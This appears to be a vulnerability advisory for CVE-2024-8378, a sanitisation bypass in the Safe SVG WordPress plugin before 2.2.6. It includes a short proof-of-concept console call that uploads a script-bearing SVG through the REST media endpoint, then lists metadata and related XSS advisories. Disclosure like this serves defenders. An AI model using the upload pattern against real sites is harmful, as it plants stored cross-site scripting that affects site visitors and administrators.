Safe SVG < 2.2.6 – Author+ SVG Sanitisation Bypass | CVE 2024-8378 | Plugin Vulnerabilities

Description

The plugin has its sanitisation code is only running for paths that call wp_handle_upload, but not for example for code that uses wp_handle_sideload which is often used to upload attachments via raw POST data.

Proof of Concept

1. Log in as an Author and open the block editor.
2. Run the following code in the browser console:

await wp.apiFetch( {
    path: '/wp/v2/media',
    method: 'POST',
    headers: {
        'Content-Type': 'image/svg+xml',
        'Content-Disposition': 'attachment; filename="demo.svg"',
    },
    body: '<svg><script>alert(1)</script></svg>',
} );

3. Check the `source_url` of the returned JSON. That file on the server will be the unsanitized SVG.

Affects Plugins

Fixed in 2.2.6

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Alexander Concha

Submitter

Miguel Xavier Penha Neto

Verified

Yes

WPVDB ID

17be4bf2-486d-43ab-b87a-2117c8d77ca8

Timeline

Publicly Published

2024-10-17 (about 1 year ago)

Added

2024-10-17 (about 1 year ago)

Last Updated

2024-11-07 (about 1 year ago)

Other

Published

Title

Published

2022-03-07

Title

Akismet Privacy Policies <= 2.0.1- Reflected Cross-Site Scripting

Published

2025-02-28

Title

SKU Generator for WooCommerce < 1.6.3 - Reflected Cross-Site Scripting

Published

2023-08-28

Title

Order Tracking Pro < 3.3.7 - Reflected Cross-Site Scripting

Published

2025-05-01

Title

KiwiChat NextClient <= 6.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via url Parameter

Published

2022-10-17

Title

WP < 6.0.3 - Multiple Stored XSS via Gutenberg